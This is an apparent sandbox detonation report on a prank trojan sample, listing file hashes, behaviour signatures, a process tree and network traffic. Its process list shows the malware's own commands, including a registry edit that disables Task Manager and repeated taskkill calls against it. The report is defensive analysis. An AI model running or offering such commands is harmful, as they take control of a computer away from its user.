| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar2575.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 14e4af4fc7bd454710711cfca26c7d66 |
| SHA1 | 7891beb464a79b2aa7ac253eeef19b679b4d3aff |
| SHA256 | 507a7716e94e01b050b7eec1ff1afaa604b5161dc4a1ec6e9d605b55be4210fa |
| SHA512 | d8014e7933885db26db8ad73d0eb44a28dd2dc4dc1778d99f9ce17d0c8d35e673b8c3ffbc0394336ac6e914fa0786fc54455cd6a554726db1e57a8ea99a32bcd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 866f26aaa8ee0b9556757886aa574e39 |
| SHA1 | 0dfb61695feff031f91455ec908feb9a534838ad |
| SHA256 | f92a15f67e530407da95ca4ee66e668abfe8a8d7e363b0aefc8e37204e592339 |
| SHA512 | ecc77edc5a55bb6e4ca4ec12e8b0b15ac75a820ca557d5cbbb948fda961fd665640eef2e48864d5c09a02bd95a87122693d17d9ea9860b256a6346f5d985b41b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 08716ef79c37729d886f4734fe6d813b |
| SHA1 | e620e8ef909835456fc2b1e13cf2d8f6eb3f1968 |
| SHA256 | 9bf8eb66a7b8b9701f6793201f3138e96a507f1aac60622a3fa0bf5754ec7ea0 |
| SHA512 | 5cd855acdd97b062c692946e0840447ef4c184c4440e7433f58c447c7b439948a8af78bf5b97e6fa45483fcfde5432b594d15a32771d8d466340f60454e07b9f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5360f71063309f24936dc8506db8eba4 |
| SHA1 | 6d2e310f6b0d1b740a4e6748901b6299f38947c7 |
| SHA256 | 4c3608d603ebc1e5b6136f99754c2f900b6cb02fb06fd4e388581a5c322d10da |
| SHA512 | deca978e8f2c77b722dee2792321ce797808f0c2fee2cc3f9a18842fc9d1e47346d3bbebab42ac91b96f5e610eacf1c22653782b9ccfcdc2d5d7eb2d6592548e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f1c6da367341f2022f95b4406e4d90a5 |
| SHA1 | 6a3e88560528936aa1dd73a72f734ac0c30a4ebc |
| SHA256 | 5af77fa6f500201721bd9e78927b59297ea0592ee88bd69f6c00c66c0a3b764a |
| SHA512 | 4975bff7cb20f08e4ec782369842ea7e3ae9933c6d47c4a9d1e38c5183e6c3790a244750402b01b1e3694054ba6fc046b9cf094e4b30cbae8ad982b34dceebb3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 00aa43a179478269e28fb3f7bcd1a3ee |
| SHA1 | fb29fe259ddb7d0963d23d9f27fc9387b51845a6 |
| SHA256 | 2f2ee1630d48dd794881d545fb53ef14cc2d63744211b7bb4757ff482ecdac9c |
| SHA512 | a93e7bbfd9bf0559e0c867caa2cce26baf0ea0fd30ec07d04780b489ab933e236ff078432707a8ebc55c995dc3f9542aa199e05c964d2a8229d7da145d5ff010 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | cd5971470be0d2c808dba99c56077516 |
| SHA1 | 120a950521212508b823737baeb699c1808119c6 |
| SHA256 | 3b5cad40fb2c41601fc42ab0563f5906acd2a165c4848a05d82fc8ae4d4f0543 |
| SHA512 | d2f327f7bc4667a4fc14148820629635bb341fc171918257f9605a2ab10afe469911e2e4755ede17913ea5abd61fd3038366f8bfd3fd6ea6ed15a1e9a2c65ae2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | df9e94a0084bc29883cd02ebb2b7dad7 |
| SHA1 | 7937411db23e920a94f6bd4768c451c807c09624 |
| SHA256 | 107bc8d4f2e6d8dbbac152435824310cd05e9d259003539a434ebd9548b14c66 |
| SHA512 | f53fc7f9d92f7586381b381b5b8a56be17fca1c60970f3affe1435f9ee440d36a796056c7eacdc74df8f0bfe5af6f4d3935398bd4139e6374d6e62414753f993 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aba7497845aa8f28d359aa1dcf1b73d3 |
| SHA1 | 64b28d4eb2bf289e08846d4abd5864f261174b81 |
| SHA256 | d97ce8fcbfd34ac86cbf5ed31e01403882693a5c0594072c85042b344351a673 |
| SHA512 | 07472732b2fe9a4c5cc90e9b0d06d34521835fc0818dc9d184e9a5027cdb84b3748c63a20a3dd12c6224fe4605de0f201c68c014997304ab2bf86680e5c14e77 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 35b5f36034fc8132182d4011a5356b06 |
| SHA1 | e4a7f4dd8058d1e0029919001635045b7c9d9b3d |
| SHA256 | 2b5607e0eb6f48b007491a001da9b5de855940d3f1bde19c3539a05a146937eb |
| SHA512 | e64d864184464c71b5fb86ad6051eaaba1eeaf82335129a2544775b349e4e1fb8369bd6c5d4228c79d6c765e6adcfae51b226aac16bbb9b1f6b6dbd10b938e6a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b433a953635fade6e14593f9940dd216 |
| SHA1 | b946530ea19ac8aef371b70c73f4d324b4931710 |
| SHA256 | cd199208352569c4d5ba6b67f6963b38b734446b85c576a2291b84d226f0dac5 |
| SHA512 | 7ef23d9dae4392095a1101c82102b95316329edf856ea791d89fd81489237614017f5e2cca6ec12fbfc9c69f5e9e8649f2b103b7641b4ff2225bc0f86a5c792a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 705869d4cececde40cda4bf55f73df2e |
| SHA1 | aab7941cbca31ac1c2179d479758f96e85cb8149 |
| SHA256 | 26347317a437071655546d027d8a926d4ab4b23bf09fa5c121506a0592beb382 |
| SHA512 | ce80a81206e5e780e0c32b224bb26da59c23117f9d98a98a01e6a843cf58a87d78f4edfef0a533a6b1db80e6b789e73218011d52e3f8b37f7065ad1c5d9cf904 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5b6afc18ad3325b62d1e01db8b845712 |
| SHA1 | 1b79792edb8f73cf0604b776c3e98f37bd48c269 |
| SHA256 | 553252fc07c25c126623d4452c335c9f9257695247c836d02cb52a4d49d101cb |
| SHA512 | c6a2e07d075d3d312804714789f1a5a55591741f6ff64f2391b7e3d4c999bd20b37b707cc4d0a1440c57268ac613a64dc4e869d77554e7de104c6b64e59b66f7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1a5ab0af8a300d71f72b5a1fca875ca4 |
| SHA1 | 5c092c777878b2892f705b6e2583eab251b1ecc3 |
| SHA256 | 598a88d0528180d3470bc16e0093d3af73a448be78058f2ccac8f83b0dc7fce6 |
| SHA512 | 52f72d6866b2daee97635ab8d8deb4b1b8ef91f381e3ce1e31a419cecb184bce075c9ee2d14105cf67259d716494d28796622bfb138756e59142e25c9f09f13b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d9be990ac475ebb8e2a157c1cb6c8601 |
| SHA1 | cdda972f09530c4bda4800d7efbabf0680166cd3 |
| SHA256 | 6964e08f197b73972f181a9d65decfd988ef1219222bc635b8dad57233b3550e |
| SHA512 | ec186f63d3bb5364dcfe90dad9438178ade00ddeb84ac29e87a2390780e108024d729ce1bdcf5e0c2c045c6d6ae4e907ebee6828eca899f2353a8de14d169458 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 042a2a4f8b8f938bc7dc4d7f37526d5a |
| SHA1 | db609701837651b271d853ade5466242cb517787 |
| SHA256 | 0b2fd78bd4c6979e4132a78b8b87dbff04085bc678712c5ea91fd138814f6724 |
| SHA512 | d2b3fe4e5ea76c6005bb08cf134353dfb738f5daab1091c8b5088cd53766a6680fb407fac4dfed71e3f3e792b926f9c78351cc86036265dc06d203ddee677a59 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9bafb57e52a318b1690a7fafef8b7179 |
| SHA1 | cece88e1f1a427cec2bb2fab93fd3cdfc022af3b |
| SHA256 | 47e7ba0c2930f3a58471d2b6aae7ec1944ad8977334fb96ab5090d945fd4dbaf |
| SHA512 | 8d9fa411313c91f2297d1cfebb6332050ae7ed54171378e8056476cac961cdb85d00780288b65168cfd8bf4dc9a0edceb01e5f510e7193af0fa89b41d6f18599 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9b250ca3a81472f7bbb59ef44b2551f4 |
| SHA1 | 52ab6683203c5bdbee202274e8ffc8c319dddcc2 |
| SHA256 | 8c12dcd6e5c31ecf4719c24222a2fdc6e7f97d701c34dc4cde5e9598e484d79f |
| SHA512 | 8a32897147f423b2c257bf879f57e208d42acacaa1de07363a4e7b6ae6e898be54c9673df8035630ee3b0f28bad960f00c92baf9415aa4dab89247cf5e97b227 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a614ade9b64ab55327c9d8761f8bfbc8 |
| SHA1 | 9664d22feedd80f4d3ec85c747590071225f150a |
| SHA256 | 313869e05945f48537ba973deee46d982798927678e8340f068cdb8c65c509e6 |
| SHA512 | 193534605b550e7158f39cd592598449d841303dd7711adf0356ac58a863414cc8ef4abc1e56855e0e279b5ffdd88eec726c671d1585b7bd7d99715360aa82e0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 97c56ccb80b537b05ec9482783cb6864 |
| SHA1 | 56daae4e60e992210831c89c26d4c63d4e8c3a62 |
| SHA256 | e064e778816b9cc6ad3252bb8a7ab69b341db508a15f460ec164a746eb63b99c |
| SHA512 | 0e6818b6e0e69be696a57384a4c3d2cc8f2350f72e0a448dbfa227b1294f490a6fd5ea6ce6408310e9e2d22fedfe64a0979f0d53531dd31e3fc9da7a95320907 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
144s
Max time network
166s
Command Line
Signatures
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Dro trojan. Virus prank.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\START.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\START.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Killer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Error_icons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New_Names.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\START.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Killer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Error_icons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\START.exe | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Dro trojan. Virus prank.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Dro trojan. Virus prank.exe"
C:\Users\Admin\AppData\Local\Temp\START.exe
"C:\Users\Admin\AppData\Local\Temp\START.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ZbDz.vbs"
C:\Users\Admin\AppData\Local\Temp\Killer.exe
"C:\Users\Admin\AppData\Local\Temp\Killer.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZbDz.bat" "
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Collapse_all.js"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHK.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SHK.bat" "
C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
Shaking_horizontally.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Shaking_horizontally.exe /F
C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe
"C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\SysWOW64\regedit.exe
"C:\Windows\System32\regedit.exe"
C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe
"C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Users\Admin\AppData\Local\Temp\Error_icons.exe
"C:\Users\Admin\AppData\Local\Temp\Error_icons.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe
"C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://neave.tv/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff897b846f8,0x7ff897b84708,0x7ff897b84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1844 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1844 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\New_Names.exe
"C:\Users\Admin\AppData\Local\Temp\New_Names.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,9670295908326733669,3400531076929216796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
"C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe"
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | neave.tv | udp |
| US | 104.21.234.134:443 | neave.tv | tcp |
| US | 104.21.234.134:443 | neave.tv | tcp |
| US | 8.8.8.8:53 | neave.com | udp |
| US | 172.67.133.34:443 | neave.com | tcp |
| US | 8.8.8.8:53 | 47.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.234.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.133.67.172.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
